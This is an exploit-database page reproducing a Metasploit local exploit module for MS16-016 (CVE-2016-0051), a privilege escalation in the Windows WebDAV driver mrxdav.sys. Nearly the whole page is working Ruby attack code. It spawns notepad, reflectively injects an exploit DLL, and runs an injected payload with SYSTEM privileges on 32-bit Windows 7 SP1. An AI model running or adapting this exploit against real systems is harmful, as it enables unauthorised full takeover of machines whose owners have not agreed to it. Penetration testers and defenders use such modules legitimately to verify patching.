MS16-016 mrxdav.sys WebDav Local Privilege Escalation

2016.07.09
Credit: Tamas Koczka
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation', 'Description' => %q{ This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tamas Koczka', # Original Exploit 'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'DisablePayloadHandler' => 'false' }, 'Targets' => [ [ 'Windows 7 SP1', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'CVE', '2016-0051' ], [ 'MSB', 'MS16-016' ] ], 'DisclosureDate' => 'Feb 09 2016', 'DefaultTarget' => 0 })) end def check if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end Exploit::CheckCode::Detected end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end print_status("Launching notepad to host the exploit...") notepad_process_pid = cmd_exec_get_pid("notepad.exe") begin process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError print_status("Operation failed. Hosting exploit in the current process...") process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll") library_path = ::File.expand_path(library_path) exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected ... injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) thread = process.thread.create(exploit_mem + offset, payload_mem) sleep(3) print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.") end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top